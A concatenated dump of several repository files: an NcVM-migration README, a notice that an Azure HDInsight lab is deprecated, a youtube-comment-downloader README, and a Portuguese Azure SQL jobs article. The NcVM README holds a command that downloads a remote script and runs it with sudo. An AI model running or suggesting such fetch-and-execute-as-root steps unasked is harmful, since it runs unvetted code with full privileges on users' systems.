a6727461e29bd58f3625e299da6c15218dfeefc5
[ "MIT" ]
null
null
null
v3-1/rest-1/auth/order-list.md
superj80820/bitopro-offical-api-docs
a6727461e29bd58f3625e299da6c15218dfeefc5
[ "MIT" ]
null
null
null
v3-1/rest-1/auth/order-list.md
superj80820/bitopro-offical-api-docs
a6727461e29bd58f3625e299da6c15218dfeefc5
[ "MIT" ]
null
null
null
# Get order list ## `GET` /orders/{pair} ## Rate limit Allow `1` request per second per IP. ## Parameters | Header | Path | Query | Type | Required | Description | Default | Range | Example | | :--- | :--- | :--- | :--- | :--- | :--- | :--- | :--- | :--- | | X-BITOPRO-APIKEY | | | string | Yes | [API Key](../authentication.md#api-key) | | | | | X-BITOPRO-PAYLOAD | | | string | Yes | [Payload](../authentication.md#payload) | | | | | X-BITOPRO-SIGNATURE | | | string | Yes | [Signature](../authentication.md#signature) | | | | | | pair | | string | Yes | The trading pair in format ${BASE}\_${QUOTE}, Please follow the [link](https://www.bitopro.com/fees) to check the pair list. | | | bito\_eth | | | | page | integer | No | The page number for the query. | 1 | | 1 | | | | active | bool | No | The flag to specify if only active\(in progress\) orders will return. | `false` | `true`, `false` | true | ## Response sample ```javascript { "data": [ { "action": "BUY", "avgExecutionPrice": "0", "bitoFee": "0", "executedAmount": "0", "fee": "0", "feeSymbol": "bito", "id": "887521192", "originalAmount": "1000", "pair": "bito_eth", "price": "0.005", "remainingAmount": "1000", "seq": "BITOETH8913789893", "status": 0, "timestamp": 1570591525592, "total": "0", "type": "LIMIT" }, { "action": "BUY", "avgExecutionPrice": "0", "bitoFee": "0", "condition": ">=", "executedAmount": "0", "fee": "0", "feeSymbol": "bito", "id": "SL-1133804403", "originalAmount": "1000", "pair": "bito_eth", "price": "0.05", "remainingAmount": "1000", "seq": "BITOETH4618822599", "status": -1, "stopPrice": "10", "timestamp": 1570591225827, "total": "0", "type": "STOP_LIMIT" }, { "action": "BUY", "avgExecutionPrice": "0", "bitoFee": "0", "condition": ">=", "executedAmount": "0", "fee": "0", "feeSymbol": "bito", "id": "SL-6256946008", "originalAmount": "1000", "pair": "bito_eth", "price": "0.05", "remainingAmount": "1000", "seq": "BITOETH2471338952", "status": -1, "stopPrice": "10", "timestamp": 1570591217063, 
"total": "0", "type": "STOP_LIMIT" } ], "page": 1, "totalPages": 1 } ``` [Back](../rest.md)
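The three authentication headers required by the endpoint above can be sketched in Python. The exact payload contents and signing scheme are defined in the linked authentication.md; as an illustration, this sketch *assumes* the payload is base64-encoded JSON and the signature is an HMAC-SHA384 hex digest of that payload keyed with the API secret — verify both against the authentication page before use. The payload fields (`identity`, `nonce`) are placeholders:

```python
import base64
import hashlib
import hmac
import json
import time


def build_auth_headers(api_key: str, api_secret: str) -> dict:
    # Hypothetical payload shape; see authentication.md for the real scheme.
    body = {"identity": "user@example.com", "nonce": int(time.time() * 1000)}
    payload = base64.b64encode(json.dumps(body).encode()).decode()
    # Assumed signing scheme: HMAC-SHA384 over the base64 payload.
    signature = hmac.new(api_secret.encode(), payload.encode(),
                         hashlib.sha384).hexdigest()
    return {
        "X-BITOPRO-APIKEY": api_key,
        "X-BITOPRO-PAYLOAD": payload,
        "X-BITOPRO-SIGNATURE": signature,
    }


headers = build_auth_headers("my-key", "my-secret")
print(sorted(headers))
```

The resulting dict can be passed as the request headers of any HTTP client when calling `GET /orders/{pair}`.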
27.054945
174
0.502031
eng_Latn
0.210022
6f4ab2a16621d9f13c293c8ee2f66fe1ca9371ba
2,535
md
Markdown
docs/abstracts/2018-05-PMC.md
apeltzer/Sarek
bf3f262e622c8c76e906f14cc8d5a2685e3d2f3d
[ "MIT" ]
168
2019-05-28T13:51:05.000Z
2022-03-26T19:46:24.000Z
docs/abstracts/2018-05-PMC.md
apeltzer/Sarek
bf3f262e622c8c76e906f14cc8d5a2685e3d2f3d
[ "MIT" ]
377
2019-05-22T13:47:09.000Z
2022-03-31T08:01:24.000Z
docs/abstracts/2018-05-PMC.md
maxulysse/nf-core_sarek
d73a192827a43089e41f709da7e80a27a975ef27
[ "MIT" ]
176
2019-05-09T12:20:38.000Z
2022-03-31T14:35:28.000Z
# Keystone Symposia - Precision Medicine in Cancer - Stockholm, Sweden, 2018/05 ## Sarek, a workflow for WGS analysis of germline and somatic mutations Maxime Garcia 123*, Szilveszter Juhos 123*, Malin Larsson 456, Teresita Díaz de Ståhl 13, Johanna Sandgren 13, Jesper Eisfeldt 73, Sebastian DiLorenzo 85A, Marcel Martin B3C, Pall Olason 95A, Phil Ewels B2C, Björn Nystedt 95A*, Monica Nistér 13, Max Käller 2D, *Corresponding Author 1. Barntumörbanken, Dept. of Oncology Pathology; 2. Science for Life Laboratory; 3. Karolinska Institutet; 4. Dept. of Physics, Chemistry and Biology; 5. National Bioinformatics Infrastructure Sweden, Science for Life Laboratory; 6. Linköping University; 7. Clinical Genetics, Dept. of Molecular Medicine and Surgery; 8. Dept. of Medical Sciences; 9. Dept. of Cell and Molecular Biology; A. Uppsala University; B. Dept. of Biochemistry and Biophysics; C. Stockholm University; D. School of Biotechnology, Division of Gene Technology, Royal Institute of Technology We present Sarek, a complete Open Source pipeline to resolve germline and somatic variants from WGS data: it is written in Nextflow, a domain-specific language for workflow building. Sarek is based on GATK best practices to prepare short-read data, in parallel for a tumor/normal pair sample. After these preprocessing steps several variant callers scan the resulting BAM files; for structural variants we use Manta. Strelka and GATK HaplotypeCaller are used to find germline variants and for somatic calls we use MuTect2 and Strelka. Finally, we apply ASCAT to estimate sample heterogeneity, ploidy and CNVs. Checkpoints allow the software to be restarted from different states. At the end of the analysis the resulting VCF files are annotated to facilitate further downstream processing. The workflow is capable of accommodating further variant callers. It can also process only the normal sample, tumor/normal pairs or even normal, tumor and several relapse samples. 
Besides variant calls, the workflow provides quality controls presented by MultiQC. For easy sharing, installation, and to ensure reproducibility, containers (Docker and Singularity) are available. The MIT licensed open source code can be downloaded from GitHub. The authors thank the Swedish Childhood Cancer Foundation for the funding of Barntumörbanken. We would like to acknowledge support from Science for Life Laboratory, the National Genomics Infrastructure, NGI, and UPPMAX for providing assistance in massive parallel sequencing and computational infrastructure.
51.734694
214
0.813412
eng_Latn
0.973413
6f4b35b21b769066d504204837bd1bfdda46c75d
28
md
Markdown
README.md
attam22/IceMoonLight
b979a4f2c3cdbed0ba424ce9557fb233fd7e276c
[ "Apache-2.0" ]
null
null
null
README.md
attam22/IceMoonLight
b979a4f2c3cdbed0ba424ce9557fb233fd7e276c
[ "Apache-2.0" ]
null
null
null
README.md
attam22/IceMoonLight
b979a4f2c3cdbed0ba424ce9557fb233fd7e276c
[ "Apache-2.0" ]
null
null
null
# IceMoonLight IceMoonLight
9.333333
14
0.857143
yue_Hant
0.98628
6f4d99b0b1c7ece14e2ca4e680d9acb4d2bb807f
1,673
md
Markdown
authors.md
haade-administrator/haade
7a434ec4781006584460625209c5a982d829ca06
[ "MIT" ]
null
null
null
authors.md
haade-administrator/haade
7a434ec4781006584460625209c5a982d829ca06
[ "MIT" ]
null
null
null
authors.md
haade-administrator/haade
7a434ec4781006584460625209c5a982d829ca06
[ "MIT" ]
null
null
null
--- layout: page title: Auteurs permalink: /authors comments: false --- <div class="list-authors mt-5"> {% for author in site.authors %} <div id="{{ author[1].name }}" class="authorbox position-relative pb-5 pt-5 mb-4 mt-4 border"> <div class="row"> <div class="wrapavname col-md-3 text-center"> {% if author[1].gravatar %} <img class="author-thumb" src="https://www.gravatar.com/avatar/{{ author[1].gravatar }}?s=250&d=mm&r=x" alt="{{ author[1].display_name }}"> {% else %} <img class="author-thumb" src="{{site.baseurl}}/{{ author[1].avatar }}" alt="{{ author[1].display_name }}"> {% endif %} <p class="mt-4 mb-0 small text-center"> {% if author[1].web %} <a target="_blank" class="d-inline-block mx-1 text-dark" href="{{ author[1].web }}"><i class="fa fa-link"></i></a> {% endif %} {% if author[1].twitter %} <a target="_blank" class="d-inline-block mx-1 text-dark" href="{{ author[1].twitter }}"><i class="fab fa-twitter"></i></a> {% endif %} {% if author[1].email %} <a class="d-inline-block mx-1 text-dark" href="mailto:{{ author[1].email }}"><i class="fa fa-envelope"></i></a> {% endif %} </p> </div> <div class="col-md-9"> <h3>{{ author[1].display_name }}</h3> <p class="mt-3 mb-0">{{ author[1].description }}</p> </div> </div> </div> {% endfor %} </div>
38.906977
153
0.468619
eng_Latn
0.237003
6f4eae27320e3c24788d4a13d550af209a43c4b6
1,185
markdown
Markdown
_posts/2017-07-19-Android-6.0-JNI-uses-long-store-pointer-address.markdown
neerajjose/utzcoz.github.io
8bac0cb38cf961af93048bf1832ab1a94d83aaa2
[ "Apache-2.0" ]
null
null
null
_posts/2017-07-19-Android-6.0-JNI-uses-long-store-pointer-address.markdown
neerajjose/utzcoz.github.io
8bac0cb38cf961af93048bf1832ab1a94d83aaa2
[ "Apache-2.0" ]
null
null
null
_posts/2017-07-19-Android-6.0-JNI-uses-long-store-pointer-address.markdown
neerajjose/utzcoz.github.io
8bac0cb38cf961af93048bf1832ab1a94d83aaa2
[ "Apache-2.0" ]
null
null
null
--- layout: post title: "Android 6.0 JNI uses long to store pointer address" date: 2017-07-19 22:47:00 +0800 categories: aosp --- Android 6.0 JNI uses long to store pointer addresses, whereas Android 5.0 JNI used int. In Android 5.0, some system servers use long to store the pointer address of a native object, while the native side stores it as int. If a system server wants to pass it to native methods, it force-casts the long parameter to int, for example `mPtr` in `InputManagerService.java`. But in Android 6.0, JNI uses long to store pointer addresses, and system servers also use long to store the pointer address of a native object, for example `mPtr` in `InputManagerService.java`. Normally, if we pay attention to the difference, there is no problem. But I encountered a weird problem when I tried to cherry-pick a feature written with JNI from Android 5.0 to Android 6.0. The feature, as written in Android 5.0, force-casts the long parameter that stores a pointer address in the system server to int when invoking native methods; when I cherry-picked it to Android 6.0, the system crashed on some occasions, because the pointer address was changed by the forced cast. WTF.
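The truncation hazard the post describes can be demonstrated outside of JNI: on a 64-bit platform, squeezing a 64-bit address into a 32-bit int silently drops the high bits, so the "pointer" the native side reconstructs is a different address. A small Python sketch of the arithmetic (the address value is hypothetical):

```python
import ctypes

# Pointer width on the current platform (8 bytes on 64-bit systems).
print(ctypes.sizeof(ctypes.c_void_p))

# A hypothetical 64-bit native address, as a jlong would carry it.
addr = 0x00007F43_2A10_9CD0

# Force-casting to a 32-bit int (what the Android 5.0-era code did)
# keeps only the low 32 bits.
truncated = addr & 0xFFFFFFFF

print(hex(truncated))      # the high bits are gone
print(truncated == addr)   # False: the reconstructed pointer differs
```

This is exactly why the cherry-picked code crashed only "in some occasions": the cast is harmless whenever the allocator happens to hand back an address that fits in 32 bits, and fatal otherwise.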
107.727273
556
0.776371
eng_Latn
0.998889
6f50a2a4ea59ea7f44c9fadb55e4e61dc9ab31d1
1,467
md
Markdown
examples/xtd.core.examples/strings/README.md
ExternalRepositories/xtd
5889d69900ad22a00fcb640d7850a1d599cf593a
[ "MIT" ]
251
2019-04-20T02:02:24.000Z
2022-03-31T09:52:08.000Z
examples/xtd.core.examples/strings/README.md
leanid/xtd
2e1ea6537218788ca08901faf8915d4100990b53
[ "MIT" ]
29
2021-01-07T12:52:12.000Z
2022-03-29T08:42:14.000Z
examples/xtd.core.examples/strings/README.md
leanid/xtd
2e1ea6537218788ca08901faf8915d4100990b53
[ "MIT" ]
27
2019-11-21T02:37:44.000Z
2022-03-30T22:59:14.000Z
# Strings examples [This folder](.) contains strings examples used by [Reference Guide](https://codedocs.xyz/gammasoft71/xtd/) and more. * [compare](compare/README.md) shows how to use [xtd::strings::compare](../../../src/xtd.core/include/xtd/strings.h) method. * [compare_ignore_case](compare_ignore_case/README.md) shows how to use [xtd::strings::compare](../../../src/xtd.core/include/xtd/strings.h) method. * [concat](concat/README.md) shows how to use [xtd::strings::concat](../../../src/xtd.core/include/xtd/strings.h) method. * [concat_collection](concat_collection/README.md) shows how to use [xtd::strings::concat](../../../src/xtd.core/include/xtd/strings.h) method. * [contains](contains/README.md) shows how to use [xtd::strings::contains](../../../src/xtd.core/include/xtd/strings.h) method. * [format](format/README.md) shows how to use [xtd::strings::format](../../../src/xtd.core/include/xtd/strings.h) method. * [format_with_order](format_with_order/README.md) shows how to use [xtd::strings::format](../../../src/xtd.core/include/xtd/strings.h) method. * [join](join/README.md) shows how to use [xtd::strings::join](../../../src/xtd.core/include/xtd/strings.h) method. * [split](split/README.md) shows how to use [xtd::strings::split](../../../src/xtd.core/include/xtd/strings.h) method. * [string_unicode](string_unicode/README.md) shows how to use [xtd::strings](../../../src/xtd.core/include/xtd/strings.h) class with unicode.
97.8
160
0.710975
eng_Latn
0.700334
6f50f2becac7826c1905ca7b19999e9dd4048fd1
277
md
Markdown
_posts/trick/2021-07-05-uso-printenv.md
Martinligabue/linuxpeople_feed
a4605af51bbde2bfbc2c37fc165556b69d22a08c
[ "MIT" ]
2
2021-07-05T18:51:48.000Z
2021-08-16T10:55:00.000Z
_posts/trick/2021-07-05-uso-printenv.md
Martinligabue/linuxpeople_feed
a4605af51bbde2bfbc2c37fc165556b69d22a08c
[ "MIT" ]
null
null
null
_posts/trick/2021-07-05-uso-printenv.md
Martinligabue/linuxpeople_feed
a4605af51bbde2bfbc2c37fc165556b69d22a08c
[ "MIT" ]
1
2021-07-17T10:02:13.000Z
2021-07-17T10:02:13.000Z
--- title: printenv description: "Print all environment variables" date: 2021-07-05 23:00 layout: post author: Davide Galati (aka PsykeDady) author_github: PsykeDady tag: trick --- Print all the environment variables of your current session with: `printenv`
19.785714
70
0.765343
ita_Latn
0.80067
6f513e0850e6be054d68817b6b565bfaa12db86e
796
md
Markdown
README.md
javawolfpack/ClimbProject
508cf822a1eb0b78f7120a3d469ceb65e3b423f7
[ "MIT" ]
null
null
null
README.md
javawolfpack/ClimbProject
508cf822a1eb0b78f7120a3d469ceb65e3b423f7
[ "MIT" ]
5
2018-11-24T16:15:24.000Z
2022-02-11T03:40:48.000Z
README.md
javawolfpack/ClimbProject
508cf822a1eb0b78f7120a3d469ceb65e3b423f7
[ "MIT" ]
1
2018-11-24T16:13:49.000Z
2018-11-24T16:13:49.000Z
# starter_repo Repo to initialize class repositories from; sets up the initial CI/CD for GitLab as well ## regular files * **Dockerfile** - Initial dockerfile to help us set up our environment * **requirements.txt** - Blank requirements.txt file for us to add Python package requirements into ## hidden files * **.gitignore** - ignores Python code & macOS-generated files that don't need to be in the repo * **.gitlab-ci.yml** - initial CI/CD pipeline file that will be used in CINS465 during class; it should be modified to fit your project/code * **.coveragerc** - provides initial settings for the coverage.py package to test our CI testing coverage and omit specific files/folders/lines that are problematic. This will need to be moved and modified to be useful, and will be introduced in class.
56.857143
253
0.766332
eng_Latn
0.993966
6f51cd11954d0243af3c632b19470153e2220933
1,503
md
Markdown
archives/2012-10-09-pork-siomai.md
ulampinoy/ulampinoy-atbp
f7f3ef984d9bb2578c43e2e7f2c9238d9261b175
[ "MIT" ]
1
2020-05-05T19:03:03.000Z
2020-05-05T19:03:03.000Z
archives/2012-10-09-pork-siomai.md
ulampinoy/ulampinoy-atbp
f7f3ef984d9bb2578c43e2e7f2c9238d9261b175
[ "MIT" ]
null
null
null
archives/2012-10-09-pork-siomai.md
ulampinoy/ulampinoy-atbp
f7f3ef984d9bb2578c43e2e7f2c9238d9261b175
[ "MIT" ]
1
2020-05-11T02:37:45.000Z
2020-05-11T02:37:45.000Z
--- date: 2012-10-09T00:00:01Z description: Pinoy-style pork dim sum with spicy soy sauce dip coverImage: /static/images/pork-siomai-with-dip.jpg title: Pork Siomai tags: - archive - pork - featured --- Siomai is the Philippines' most popular dim sum. You can find it everywhere – from the tiniest streets to the mega malls. Siomai is easily the fastest merienda or even an ulam option. It has the perfect combination of pork and spicy dip (saw-sawan). Siomai comes in different varieties and flavor mutations, but we love the classic and simple pork siomai. ### Ingredients * 1/2 kg ground pork * 1 medium carrot, grated * 1 medium onion, finely chopped * 4 stalks green onions * 1 teaspoon sesame oil * 3/4 cup flour * 1 egg * wonton wrapper * salt and black pepper to taste <img src="/static/images/sesame-oil-carrots.jpg" title="Sesame oil and shredded vegetables"> ### The Dip * 2 teaspoons soy sauce * 1 teaspoon lemon juice * spicy chili-garlic paste <img src="/static/images/shredder-carrots-onion.jpg" title="Shredder, carrot and spring onion"> ### Quick Tips * If you are buying your meat from the market or meat shop, choose a pork cut with layers of fat, like pork belly, and have it ground twice to make finer-textured dumplings. * You can add shrimp to add another layer of flavor. * Use a grater for the onions and carrots – easier and finer results than chopping with a knife. Please [SUBSCRIBE to the Ulam Pinoy Channel](http://www.youtube.com/user/ulampinoy). *Salamat!*
35.785714
248
0.751164
eng_Latn
0.979403
6f521591f534ca6867854d5eec9a76984dc9b8bc
4,700
md
Markdown
README.md
nklomp/thinkcell-creator
2f84aa06d951d24a02c1e00cdb9254ce8df477f6
[ "Apache-2.0" ]
null
null
null
README.md
nklomp/thinkcell-creator
2f84aa06d951d24a02c1e00cdb9254ce8df477f6
[ "Apache-2.0" ]
1
2020-09-09T19:43:48.000Z
2020-09-09T19:43:48.000Z
README.md
nklomp/thinkcell-creator
2f84aa06d951d24a02c1e00cdb9254ce8df477f6
[ "Apache-2.0" ]
null
null
null
# Thinkcell creator This program converts a comma-separated values (CSV) file, for instance from a database export, and creates ThinkCell-compatible output according to a user-defined template. Please note that this program was written in a few hours, so it lacks a lot of features and is quite crude. Having said that, it does allow you to use all kinds of different input CSV files together with template files to create the ThinkCell output. Several configuration properties can be set in the file config/application.properties. The template(s) can be found in the config folder as well. ## Running the program To run the program, execute the following command from the directory where you extracted the program: ``` thinkcellOutput.bat <input-csv-file> ``` So for instance ``` thinkcellOutput.bat /Users/nklomp/Example-Input.csv ``` If you want to run it without the cmd script because you are using an operating system other than Windows, execute: ``` java -jar think-cell.*.jar <input-csv-file> ``` ## Installation You can extract the zip file in any folder you like. No additional installation is required. This application is written in Java, so a Java Runtime Environment (https://java.com) version 8 is required. Once you have extracted the application into a folder of your choice, you will have to start the application from a command prompt in that folder. 
## Template A sample template: ``` [{ "template": "template.pptx", "data": [{ "name": "Chart5", "table": [ [null, <#list headers as header>{"string": "${header}"}<#sep>,</#list>], [], <#list records as record> [<#list record as recordValue>{"<#if recordValue?is_first>string<#else>number</#if>": <#if recordValue?is_first>"${recordValue}"<#else>${recordValue}</#if>}<#sep>, </#list>]<#sep>, </#list> ] } ] }] ``` The header variable will be replaced by all the headers on the first line of the input CSV file, as long as the following configuration property is set: ``` # Whether a header line is present in the CSV file thinkcell.csv.header-line-present=true ``` The record variable will be replaced by a single line of values from the CSV file. The example above showcases a distinction for the first column, where the key is the word "string", whilst the rest of the columns have "number" as a key. ## Output Example In the current version the output will be printed on the console. A future version will be able to write an output file as well. 
Since the output is printed to the console, you should open a CMD prompt before running the thinkcellOutput.bat file. You can copy the values between the ------ CUT ------ lines ``` [{ "template": "template.pptx", "data": [{ "name": "Chart5", "table": [ [null, {"string": "CAPITAL_PROJECT_NAME"},{"string": "CAPEX"},{"string": "OPEX"},{"string": "Feedgas"},{"string": "Shipping"},{"string": "Gov''t Take"},{"string": "Non LNG Revenue (condensate, domgas)"},{"string": "LNG Delivered Cost"}], [], [{"string": "Brown"}, {"number": 1,00}, {"number": 1,30}, {"number": }, {"number": 0,89}, {"number": }, {"number": 1,98}, {"number": 6,93}], [{"string": "Fair"}, {"number": 1,79}, {"number": 2,00}, {"number": }, {"number": 0,44}, {"number": }, {"number": 1,10}, {"number": 2,20}], [{"string": "Neo"}, {"number": 1,20}, {"number": 0,91}, {"number": 4,00}, {"number": 0,58}, {"number": }, {"number": 0,84}, {"number": 3,00}], [{"string": "Gogo"}, {"number": 1,00}, {"number": 1,00}, {"number": }, {"number": 1,20}, {"number": }, {"number": 0,44}, {"number": 3,00}], [{"string": "Quick win"}, {"number": 2,00}, {"number": 1,22}, {"number": 2,00}, {"number": 1,00}, {"number": }, {"number": 0,76}, {"number": 5,05}], [{"string": "Triumph"}, {"number": 1,00}, {"number": 0,83}, {"number": 1,00}, {"number": 0,59}, {"number": }, {"number": 0,54}, {"number": 4,79}] ] } ] }] ``` ## Current configuration support ```properties # The delimiter used in the CSV file thinkcell.csv.delimeter=; # Whether a header line is present in the CSV file thinkcell.csv.header-line-present=true # CSV format to use. One of "excel", "default" thinkcell.csv.format=excel # The directory where the templates are stored thinkcell.template.directory=src/main/resources/ # The template file to use for the output json thinkcell.template.output-file=output-template.ftl # The template locale, en-US by default thinkcell.template.locale=en-US ```
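The CSV-to-template mapping the README describes — the headers become the first table row, and each subsequent record becomes a row whose first cell is a string label and whose remaining cells are number entries — can be sketched in a few lines of Python. This is an illustration of the mapping only, not the actual Java/FreeMarker implementation; the function name is invented:

```python
import csv
import io


def csv_to_table(text: str, delimiter: str = ";"):
    """Map a delimited export to a ThinkCell-style table structure."""
    rows = list(csv.reader(io.StringIO(text), delimiter=delimiter))
    header, records = rows[0], rows[1:]
    # Row 1: null cell plus one {"string": ...} cell per header;
    # row 2 is the empty spacer row the template emits.
    table = [[None] + [{"string": h} for h in header], []]
    for rec in records:
        # First column is a label; remaining cells become "number"
        # entries, kept as the exported string values.
        table.append([{"string": rec[0]}] + [{"number": v} for v in rec[1:]])
    return table


sample = "NAME;CAPEX;OPEX\nBrown;1.00;1.30\nFair;1.79;2.00"
table = csv_to_table(sample)
print(table[0][1])  # {'string': 'NAME'}
```

Wrapping the result in the outer `{"template": ..., "data": [...]}` envelope then yields the same shape as the output example above.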
38.842975
254
0.638085
eng_Latn
0.980684
6f52d03dded6864edd3e13b0b7a3f66dd5aef478
31
md
Markdown
README.md
Ameejr/Door-automatic-control-system
2fccfdf32c3bd9455daa786c3718513662bcb841
[ "BSL-1.0" ]
1
2021-03-13T05:55:31.000Z
2021-03-13T05:55:31.000Z
README.md
Ameejr/Door-automatic-control-system
2fccfdf32c3bd9455daa786c3718513662bcb841
[ "BSL-1.0" ]
null
null
null
README.md
Ameejr/Door-automatic-control-system
2fccfdf32c3bd9455daa786c3718513662bcb841
[ "BSL-1.0" ]
null
null
null
# Door-automatic-control-system
31
31
0.83871
nld_Latn
0.203373
6f52e2becfaebe3dcb458181f332fb345024be77
2,218
md
Markdown
windows.networking.backgroundtransfer/backgroundtransfercontentpart.md
stefb965/winrt-api
89da6197d3c4c09e3bbb4966b984a6da790614f3
[ "CC-BY-4.0", "MIT" ]
null
null
null
windows.networking.backgroundtransfer/backgroundtransfercontentpart.md
stefb965/winrt-api
89da6197d3c4c09e3bbb4966b984a6da790614f3
[ "CC-BY-4.0", "MIT" ]
null
null
null
windows.networking.backgroundtransfer/backgroundtransfercontentpart.md
stefb965/winrt-api
89da6197d3c4c09e3bbb4966b984a6da790614f3
[ "CC-BY-4.0", "MIT" ]
1
2022-03-12T22:14:59.000Z
2022-03-12T22:14:59.000Z
--- -api-id: T:Windows.Networking.BackgroundTransfer.BackgroundTransferContentPart -api-type: winrt class --- <!-- Class syntax. public class BackgroundTransferContentPart : Windows.Networking.BackgroundTransfer.IBackgroundTransferContentPart --> # Windows.Networking.BackgroundTransfer.BackgroundTransferContentPart ## -description Represents a content part of a multi-part transfer request. Each [BackgroundTransferContentPart](backgroundtransfercontentpart.md) object can represent either a single string of text content or a single file payload, but not both. ## -remarks ## -examples The following example demonstrates how to configure and begin a multi-part upload operation, and is based on the [Background Transfer sample](http://go.microsoft.com/fwlink/p/?linkid=245064) offered in the Windows Sample Gallery. ```javascript var upload = null; var promise = null; function MultipartUpload (uriString, files) { try { var uri = Windows.Foundation.Uri(uriString); var uploader = new Windows.Networking.BackgroundTransfer.BackgroundUploader(); var contentParts = []; files.forEach(function (file, index) { var part = new Windows.Networking.BackgroundTransfer.BackgroundTransferContentPart("File" + index, file.name); part.setFile(file); contentParts.push(part); }); // Create a new upload operation. uploader.createUploadAsync(uri, contentParts).then(function (uploadOperation) { // Start the upload and persist the promise to be able to cancel the upload. upload = uploadOperation; promise = uploadOperation.startAsync().then(complete, error, progress); }); } catch (err) { displayError(err); } }; ``` ## -see-also [CreateDownload(Uri, IStorageFile, IStorageFile)](backgrounddownloader_createdownload_1461958690.md), [CreateUploadAsync](backgrounduploader_createuploadasync.md) ## -capabilities internetClient, internetClientServer, privateNetworkClientServer
40.327273
230
0.674482
eng_Latn
0.406922
6f53050f433183e786a69e20e8a8501d3ff4dc2e
742
md
Markdown
_extend/solon.serialization.snack3/README.md
hanxiao34/solon
5b25e7810859d583f9f2e90ded955198a16b21e4
[ "Apache-2.0" ]
1
2022-01-24T06:01:27.000Z
2022-01-24T06:01:27.000Z
_extend/solon.serialization.snack3/README.md
hanxiao34/solon
5b25e7810859d583f9f2e90ded955198a16b21e4
[ "Apache-2.0" ]
null
null
null
_extend/solon.serialization.snack3/README.md
hanxiao34/solon
5b25e7810859d583f9f2e90ded955198a16b21e4
[ "Apache-2.0" ]
1
2022-02-07T08:52:16.000Z
2022-02-07T08:52:16.000Z
### Formatting customization ```java public class DemoApp { public static void main(String[] args){ Solon.start(DemoApp.class, args, app->{ initMvcJsonCustom(); }); } /** * Initialize JSON customization (must be done before plugins run) */ private static void initMvcJsonCustom() { //Use converters to customize simple types SnackRenderFactory.global .addConvertor(Date.class, s -> s.getTime()); SnackRenderFactory.global .addConvertor(LocalDate.class, s -> s.format(DateTimeFormatter.ofPattern("yyyy-MM-dd"))); SnackRenderFactory.global .addConvertor(LocalDateTime.class, s -> s.format(DateTimeFormatter.ofPattern("yyyy-MM-dd HH:mm"))); } } ```
--- layout: tutorial_hands_on title: "M. tuberculosis Variant Analysis" zenodo_link: https://doi.org/10.5281/zenodo.3496437 tags: - prokaryote questions: - "How do we detect differences between a set of reads from *M. tuberculosis* (Mtb) and the Mtb reference genome" objectives: - "How should we filter those variants" - "How can we predict drug resistance from those variants" - "How do we annotate those variants" time_estimation: "2h" level: Intermediate key_points: - variants in *M. tuberculosis* sequencing data can be discovered using common microbial bioinformatics tools - it is not enough to just call variants, variant calling involves multiple quality control steps - the choice of reference genome and some quality control procedures are species specific, and require knowledge of the organism in question contributors: - pvanheus - slugger70 - thobalose --- # Introduction {:.no_toc} Tuberculosis (TB) is an infectious disease caused by the bacterium *Mycobacterium tuberculosis*. According to the [WHO](https://www.who.int/tb/publications/global_report/en/), in 2018 there were 10.0 million new cases of TB worldwide and 1.4 million deaths due to the disease, making TB the world's most deadly infectious disease. The [publication](https://www.ncbi.nlm.nih.gov/pubmed/9634230) of the genome of *M. tuberculosis H37Rv* in 1998 gave researchers a powerful new tool in understanding this pathogen. This genome has been revised since then, with the latest version being available as RefSeq entry [NC_000962.3](https://www.ncbi.nlm.nih.gov/nuccore/NC_000962.3/). The genome comprises a single circular chromosome of some 4.4 megabases. The H37Rv strain that the genome was sequenced from is a long-preserved laboratory strain, originally [isolated](https://www.ncbi.nlm.nih.gov/pmc/articles/PMC2132400) from a patient in 1905 and [named](https://journals.sagepub.com/doi/abs/10.3181/00379727-33-8330P) as H37Rv in 1935. 
It is notably different in some genomic [regions](https://www.sciencedirect.com/science/article/pii/S0888754317300617?via%3Dihub) from some modern clinical strains but remains the standard reference sequence for *M. tuberculosis* (Mtb).

In a larger context *M. tuberculosis* is a prominent member of the Mycobacterium Tuberculosis Complex (MTBC). This group of related species comprises the [8](https://www.nature.com/articles/s41467-020-16626-6) [lineages](https://www.ncbi.nlm.nih.gov/pubmed/29456241) of human-infecting *M. tuberculosis* as well as predominantly animal-infecting species such as *M. bovis* and *M. pinnipedii*. Two other close relatives of Mtb, *M. leprae* and *M. lepromatosis*, circulate between humans, causing the disease leprosy. Finally, amongst the Mycobacteria there are several other species that live in the environment and can cause human disease. These are the [Nontuberculous Mycobacteria](https://www.ncbi.nlm.nih.gov/pubmed/28345639).

Variation in the genome of *M. tuberculosis* (Mtb) is associated with changes in phenotype, for example [drug resistance](https://genomemedicine.biomedcentral.com/articles/10.1186/s13073-019-0660-8) and virulence. It is also useful for [outbreak investigation](https://www.frontiersin.org/articles/10.3389/fpubh.2019.00087/full) as the single nucleotide polymorphisms (SNPs) in a sample can be used to build a phylogeny. This tutorial will focus on identifying genomic variation in Mtb and using that to explore drug resistance and other aspects of the bacteria.

# Get your data

The data for today is a sample of *M. tuberculosis* [collected](https://www.ncbi.nlm.nih.gov/bioproject/PRJEB18529) from a [southern African patient](https://bmcmedicine.biomedcentral.com/articles/10.1186/s12916-017-0834-4).
In addition to the bacterial sequence sample we will work with a Genbank format version of the genome of the [inferred](https://www.nature.com/articles/ng.590) most recent common [ancestor](https://zenodo.org/record/3497110) of the M. tuberculosis complex which is combined with the annotation of the H37Rv reference sequence. This ancestral genome only differs from the H37Rv version 3 genome ([NC_000962.3](https://www.ncbi.nlm.nih.gov/nuccore/NC_000962.3)) by the insertion of SNPs to try and model the ancestor of all lineages of Mtb. > ### {% icon hands_on %} Hands-on: Get the data > > 1. {% tool [Import](upload1) %} the following files from [Zenodo](https://doi.org/10.5281/zenodo.3960260) or from the shared data library >``` >https://zenodo.org/record/3960260/files/004-2_1.fastq.gz >https://zenodo.org/record/3960260/files/004-2_2.fastq.gz >https://zenodo.org/record/3960260/files/Mycobacterium_tuberculosis_ancestral_reference.gbk >https://zenodo.org/record/3960260/files/MTB_ancestor_reference.fasta >https://zenodo.org/record/3960260/files/Mycobacterium_tuberculosis_h37rv.ASM19595v2.45.chromosome.Chromosome.gff3 >``` > > {% snippet snippets/import_via_link.md %} > {% snippet snippets/import_from_data_library.md %} > {: .hands_on} # Quality control This step serves the purpose of identifying possible issues with the raw sequenced reads input data before embarking on any "real" analysis steps. Some of the typical problems with NGS data can be mitigated by preprocessing affected sequencing reads before trying to map them to the reference genome. Detecting some other, more severe problems early on may at least save you a lot of time spent on analyzing low-quality data that is not worth the effort. Here, we will perform a standard quality check on our input data and only point out a few interesting aspects about that data. 
